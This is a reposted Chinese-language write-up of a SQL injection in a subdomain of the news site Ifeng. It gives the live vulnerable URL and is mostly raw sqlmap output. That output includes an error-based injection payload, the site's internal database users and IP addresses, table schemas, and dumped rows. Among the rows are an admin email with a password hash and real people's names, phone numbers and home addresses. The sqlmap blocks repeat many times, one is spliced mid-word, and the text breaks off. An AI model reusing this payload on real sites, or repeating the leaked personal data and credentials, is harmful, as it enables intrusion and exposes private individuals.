欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  数据库

凤凰网分站SQL注入漏洞_MySQL

程序员文章站 2022-05-22 14:54:02
...
凤凰网分站SQL注入漏洞注入地址:http://app.bbs.ifeng.com/dkjs/data.php?callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined

单引号回车后报错,爆路径,于是丢到sqlmap中跑

之后就什么都有了

首先是数据库列表

凤凰网分站SQL注入漏洞_MySQL

之后查看是否是dba之后查看用户列表

完完全全的暴露了内网的ip和其他数据库地址

剩下的看代码吧

sqlmap identified the following injection points with a total of 1624 HTTP(s) requests:
---
Place: GET
Parameter: order_by
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined
---

available databases [11]:
[*] app_bbs
[*] app_news
[*] app_weather
[*] apphistory_news
[*] appmil_news
[*] appsports_news
[*] baike_health
[*] baike_house
[*] information_schema
[*] mysql
[*] test

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined
---

database management system users [234]:
[*] ''@'localhost'
[*] 'B74wNuTbbx'@'10.11.2.89'
[*] 'B74wNuTbbx'@'10.11.2.90'
[*] 'B74wNuTbbx'@'10.13.2.134'
[*] 'B74wNuTbbx'@'10.13.2.135'
[*] 'B74wNuTbbx'@'10.13.2.176'
[*] 'B74wNuTbbx'@'10.13.2.177'
[*] 'B74wNuTbbx'@'220.181.67.192'
[*] 'iadmin'@'211.151.61.77'
[*] 'root'@'10.13.2.132'
[*] 'root'@'10.13.2.134'
[*] 'root'@'10.13.2.135'
[*] 'root'@'10.13.2.176'
[*] 'root'@'10.13.2.177'
[*] 'root'@'127.0.0.1'
[*] 'root'@'192.168.2.162'
[*] 'root'@'192.168.2.167'
[*] 'root'@'220.181.24.100'
[*] 'root'@'220.181.24.166'
[*] 'root'@'220.181.24.2'
[*] 'root'@'220.181.67.192'
[*] 'root'@'localhost'
[*] 'zabbix'@'127.0.0.1'

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined
---

available databases [11]:
[*] app_bbs
[*] app_news
[*] app_weather
[*] apphistory_news
[*] appmil_news
[*] appsports_news
[*] baike_health
[*] baike_house
[*] information_schema
[*] mysql
[*] test

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined
---

Database: app_bbs
[1 table]
+------+
| dkjs |
+------+

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined
---

Database: baike_house
[32 tables]
+-----------------------+
| wiki_activation |
| wiki_advertisement |
| wiki_attachment |
| wiki_autosave |
| wiki_banned |
| wiki_blacklist |
| wiki_category |
| wiki_channel |
| wiki_comment |
| wiki_creditdetail |
| wiki_doc |
| wiki_docreference |
| wiki_edition |
| wiki_focus |
| wiki_friendlink |
| wiki_language |
| wiki_lock |
| wiki_plugin |
| wiki_pluginhook |
| wiki_pluginvar |
| wiki_pms |
| wiki_regular |
| wiki_regular_relation |
| wiki_regulargroup |
| wiki_session |
| wiki_setting |
| wiki_style |
| wiki_synonym |
| wiki_task |
| wiki_user |
| wiki_usergroup |
| wiki_word |
+-----------------------+

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined
---

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined
---

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATsqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined
---

available databases [11]:
[*] app_bbs
[*] app_news
[*] app_weather
[*] apphistory_news
[*] appmil_news
[*] appsports_news
[*] baike_health
[*] baike_house
[*] information_schema
[*] mysql
[*] test

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined
---

Database: baike_house
Table: wiki_user
[22 columns]
+------------+-----------------------+
| Column | Type |
+------------+-----------------------+
| birthday | int(10) unsigned |
| checkup | int(10) unsigned |
| creates | mediumint(8) unsigned |
| credits | int(10) |
| edits | mediumint(8) unsigned |
| email | char(50) |
| gender | tinyint(1) |
| groupid | smallint(6) unsigned|
| image | varchar(255) |
| language | varchar(20) |
| lastip | char(15) |
| lasttime | int(10) unsigned |
| location | varchar(30) |
| password | char(32) |
| regip | char(15) |
| regtime | int(10) unsigned |
| signature| text |
| style | varchar(20) |
| timeoffset | varchar(20) |
| uid | mediumint(8) unsigned |
| username | char(15) |
| views | int(10) unsigned |
+------------+-----------------------+

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined
---

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined
---

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined
---

Database: baike_house
Table: wiki_user
[10 entries]
+-----+---------+---------+---------+-------+-------+---------+-----------------+--------+----------------+---------+------------+---------+---------+------------+----------+-----------------+----------+----------------------------------+----------+-----------+------------+
| uid | groupid | image | style | edits | views | regip | email | gender | lastip | checkup | regtime | credits | creates | lasttime | location | username | birthday | password | language | signature | timeoffset |
+-----+---------+---------+---------+-------+-------+---------+-----------------+--------+----------------+---------+------------+---------+---------+------------+----------+-----------------+----------+----------------------------------+----------+-----------+------------+
| 1 | 4 | | default | 0 | 59 | | wuwei@ifeng.com | 0 | 220.181.24.2 | 1 | 1270174931 | 21 | 0 | 1270174967 | | house_admin | 0 | e10adc3949ba59abbe56e057f20f883e | zh | | 8 |
| 2 | 4 | | default | 2 | 171 | | | 0 | 220.181.67.192 | 1 | 0 | 41 | 1 | 1286971633 | | 冠缨豺郎 | 0 | | zh | | 8 |
| 3 | 2 | | default | 0 | 29 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | zhaoxiaoxiong | 0 | | zh | | 8 |
| 4 | 4 | | default | 44 | 825 | | | 0 | 220.181.67.192 | 1 | 0 | 264 | 23 | 1287390647 | | 漫巴 | 0 | | zh | | 8 |
| 5 | 8 | | default | 7 | 1140| | | 0 | 220.181.24.2 | 1 | 0 | 663 | 124 | 1270429517 | | 西瓜妹 | 0 | | zh | | 8 |
| 6 | 2 | | default | 0 | 29 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | zhuantou | 0 | | zh | | 8 |
| 7 | 2 | | default | 0 | 30 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | c100 | 0 | | zh | | 8 |
| 8 | 8 | | default | 7 | 1183| | | 0 | 220.181.24.2 | 1 | 0 | 794 | 150 | 1270959387 | | 金鱼77 | 0 | | zh | | 8 |
| 9 | 2 | | default | 0 | 31 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | qq15236958@sina | 0 | | zh | | 8 |
| 10| 7 | | default | 0 | 793 | | | 0 | 220.181.24.2 | 1 | 0 | 533 | 102 | 1270545218 | | qq15236958 | 0 | | zh | | 8 |
+-----+---------+---------+---------+-------+-------+---------+-----------------+--------+----------------+---------+------------+---------+---------+------------+----------+-----------------+----------+----------------------------------+----------+-----------+------------+

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined
---

Database: baike_house
Table: wiki_user
[11 entries]
+-----+---------+---------+---------+-------+-------+---------+---------+--------+---------+---------+---------+---------+---------+----------+----------+--------------+----------+----------+----------+-----------+------------+
| uid | groupid | image | style | edits | views | regip | email | gender | lastip| checkup | regtime | credits | creates | lasttime | location | username | birthday | password | language | signature | timeoffset |
+-----+---------+---------+---------+-------+-------+---------+---------+--------+---------+---------+---------+---------+---------+----------+----------+--------------+----------+----------+----------+-----------+------------+
| 100 | 2 | | default | 0 | 6 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | yangganghong | 0 | | zh | | 8 |
| 101 | 2 | | default | 0 | 6 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | 肖张氏 | 0 | | zh | | 8 |
| 102 | 2 | | default | 0 | 6 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | hanruikai | 0 | | zh | | 8 |
| 103 | 2 | | default | 0 | 7 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | cbgwllcjt | 0 | | zh | | 8 |
| 104 | 2 | | default | 0 | 4 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | gk777 | 0 | | zh | | 8 |
| 105 | 2 | | default | 0 | 4 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | 品酸 | 0 | | zh | | 8 |
| 106 | 2 | | default | 0 | 3 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | daiyb | 0 | | zh | | 8 |
| 107 | 2 | | default | 0 | 6 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | 欧阳君山 | 0 | | zh | | 8 |
| 108 | 2 | | default | 0 | 3 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | 小马不识途 | 0 | | zh | | 8 |
| 109 | 2 | | default | 0 | 6 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | gxy891029 | 0 | | zh | | 8 |
| 110 | 2 | | default | 0 | 6 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | 晓飞416329 | 0 | | zh | | 8 |
+-----+---------+---------+---------+-------+-------+---------+---------+--------+---------+---------+---------+---------+---------+----------+----------+--------------+----------+----------+----------+-----------+------------+

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined
---

available databases [11]:
[*] app_bbs
[*] app_news
[*] app_weather
[*] apphistory_news
[*] appmil_news
[*] appsports_news
[*] baike_health
[*] baike_house
[*] information_schema
[*] mysql
[*] test

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined
---

Database: baike_health
[35 tables]
+------------------------+
| wiki_activation |
| wiki_advertisement |
| wiki_attachment |
| wiki_autosave |
| wiki_banned |
| wiki_blacklist |
| wiki_category |
| wiki_category_20100224 |
| wiki_channel |
| wiki_comment |
| wiki_creditdetail |
| wiki_doc |
| wiki_doc_20100224_20 |
| wiki_doc_temp_copy |
| wiki_docreference |
| wiki_edition |
| wiki_focus |
| wiki_friendlink |
| wiki_language |
| wiki_lock |
| wiki_plugin |
| wiki_pluginhook |
| wiki_pluginvar |
| wiki_pms |
| wiki_regular |
| wiki_regular_relation|
| wiki_regulargroup |
| wiki_session |
| wiki_setting |
| wiki_style |
| wiki_synonym |
| wiki_task |
| wiki_user |
| wiki_usergroup |
| wiki_word |
+------------------------+

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined
---

Database: baike_health
Table: wiki_user
[11 entries]
+-----+---------+---------+---------+-------+-------+---------+---------+--------+----------------+---------+---------+---------+---------+------------+----------+----------------+----------+----------+----------+-----------+------------+
| uid | groupid | image | style | edits | views | regip | email | gender | lastip | checkup | regtime | credits | creates | lasttime | location | username | birthday | password | language | signature | timeoffset |
+-----+---------+---------+---------+-------+-------+---------+---------+--------+----------------+---------+---------+---------+---------+------------+----------+----------------+----------+----------+----------+-----------+------------+
| 100 | 2 | | default | 0 | 0 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | 新娘jiujiu | 0 | | zh | | 8 |
| 101 | 2 | | default | 0 | 0 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | 江湖一鸣 | 0 | | zh | | 8 |
| 102 | 2 | | default | 0 | 40 | | | 0 | 59.175.185.178 | 1 | 0 | 21 | 0 | 1267751010 | | erxy | 0 | | zh | | 8 |
| 103 | 2 | | default | 0 | 0 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | fuf | 0 | | zh | | 8 |
| 104 | 2 | | default | 0 | 0 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | 墨侃 | 0 | | zh | | 8 |
| 105 | 2 | | default | 0 | 0 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | maiky1987 | 0 | | zh | | 8 |
| 106 | 2 | | default | 0 | 0 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | yantachenzhong | 0 | | zh | | 8 |
| 107 | 2 | | default | 0 | 0 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | chen0928 | 0 | | zh | | 8 |
| 108 | 2 | | default | 0 | 0 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | 高老庄0560 | 0 | | zh | | 8 |
| 109 | 2 | | default | 0 | 0 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | 为了国家的80后 | 0 | | zh | | 8 |
| 110 | 2 | | default | 0 | 0 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | bxbglg123 | 0 | | zh | | 8 |
+-----+---------+---------+---------+-------+-------+---------+---------+--------+----------------+---------+---------+---------+---------+------------+----------+----------------+----------+----------+----------+-----------+------------+

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined
---

available databases [11]:
[*] app_bbs
[*] app_news
[*] app_weather
[*] apphistory_news
[*] appmil_news
[*] appsports_news
[*] baike_health
[*] baike_house
[*] information_schema
[*] mysql
[*] test

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined
---

Database: app_bbs
[1 table]
+------+
| dkjs |
+------+

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined
---

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined
---

Database: app_bbs
Table: dkjs
[3 entries]
+-----+---------+------+-------------------+-------------+--------------+--------+--------+--------+--------+--------+-----------------+----------+---------------------+
| id| city | name | story | phone | school | is_wap | photo3 | verify | photo2 | photo1 | address | province | submit_time |
+-----+---------+------+-------------------+-------------+--------------+--------+--------+--------+--------+--------+-----------------+----------+---------------------+
| 122 | 南阳 | 李果 | 失业,多次评为优秀教师,模范班主任 | 13037606030 | 河南邓州市穰东镇葛营小学 | 0 | 4 | yes | 4 | 4 | 河南省邓州市穰东镇前庄村轩寺组 | 河南 | 2010-02-05 16:08:03 |
| 123 | | 晓清 | | 13017329166 | 某学校 | 0 | 4 | yes | 4 | 4 | 湖南 | 湖南 | 2010-02-05 16:14:31 |
| 124 | 梧州 | 郭伟民| | 13878431590 | 岑溪市樟木镇思孟联办中学 | 0 | 4 | yes | 4 | 4 | 岑溪市城中路20号 | 广西 | 2010-02-05 16:14:38 |
+-----+---------+------+-------------------+-------------+--------------+--------+--------+--------+--------+--------+-----------------+----------+---------------------+

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined
---

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined
---

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined
---

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined
---

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined
---

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined
---

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined
---

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined
---

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
